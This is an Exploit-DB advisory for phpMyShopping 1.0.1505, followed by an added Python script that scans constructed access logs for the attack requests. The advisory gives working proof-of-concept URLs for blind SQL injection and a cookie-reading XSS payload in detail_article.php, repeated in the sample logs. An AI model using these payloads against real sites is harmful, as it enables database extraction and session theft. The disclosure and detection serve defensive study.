phpMyShopping 1.0.1505 – Multiple Vulnerabilities

  • Author: Metropolis
    Date: 2010-10-01
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/15173/
    ####################################################################
    .:. Author : Metropolis
    .:. Home : www.metropolis.fr.cr 
    .:. Script : PhpMyShopping 
    .:. Version : v1.0.1505
    .:. Download Script: http://www.phpmyshopping.org/night_build/PhpMyShopping_mono_boutique_v1.0.1505.tar.gz
    .:. Bug Type : Multiple Vulnerabilities / Blind SQL Injections / XSS 
    
    ####################################################################
     
    ===[ Blind SQL Injection ]===
     
    SQL Error =>
     
    /detail_article.php?C=3&P=7'
     
     www.site.com/detail_article.php?C=3&P=7 [Blind]
    
    [Demo] :
    
    www.site.com/detail_article.php?C=3&P=1 and 1=1 <-- true
    
    www.site.com/detail_article.php?C=3&P=1 and 1=2 <-- false
    
    ===[ XSS ]===
    
     www.site.com/detail_article.php?C=3&P=7 [XSS]
    
    [Demo] :
     
     www.site.com/detail_article.php?C=3&P=7"><script>alert(document.cookie);</script>
    
    
     ####################################################################
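
Both demos above put non-integer input into the P id of detail_article.php, so the same requests stand out in web server access logs. The following is an added example, not part of the original advisory: a Python scan that flags any C or P value that is not a plain integer. The log lines, client addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (combined log format) for illustration only.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Oct/2010:10:00:01 +0000] "GET /detail_article.php?C=3&P=7 HTTP/1.1" 200 5120
192.0.2.11 - - [01/Oct/2010:10:00:05 +0000] "GET /detail_article.php?C=3&P=7%27 HTTP/1.1" 200 812
192.0.2.11 - - [01/Oct/2010:10:00:09 +0000] "GET /detail_article.php?C=3&P=1%20and%201=1 HTTP/1.1" 200 5120
192.0.2.11 - - [01/Oct/2010:10:00:10 +0000] "GET /detail_article.php?C=3&P=1%20and%201=2 HTTP/1.1" 200 903
192.0.2.12 - - [01/Oct/2010:10:01:00 +0000] "GET /detail_article.php?C=3&P=7%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5300
192.0.2.13 - - [01/Oct/2010:10:02:00 +0000] "GET /index.php?page=2 HTTP/1.1" 200 4000
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
NUMERIC_PARAMS = ("C", "P")  # the ids the advisory shows as integers

def classify(value):
    """Label a non-numeric id value by the pattern it most resembles."""
    if re.search(r"[<>]", value):
        return "markup"          # HTML/script input, as in the XSS demo
    if re.search(r"\b(and|or)\b.+=", value, re.I):
        return "boolean-test"    # true/false pair, as in the blind SQLi demo
    if "'" in value or '"' in value:
        return "quote"           # stray quote, as in the SQL error request
    return "non-numeric"

def scan(log_text):
    """Return (client, param, label, value) for every non-integer C/P value."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/detail_article.php"):
            continue
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name in NUMERIC_PARAMS and not re.fullmatch(r"\d+", value):
                findings.append((client, name, classify(value), value))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule is the fix on the application side: a request whose C or P value fails it should be rejected before the value reaches the SQL query or the page output.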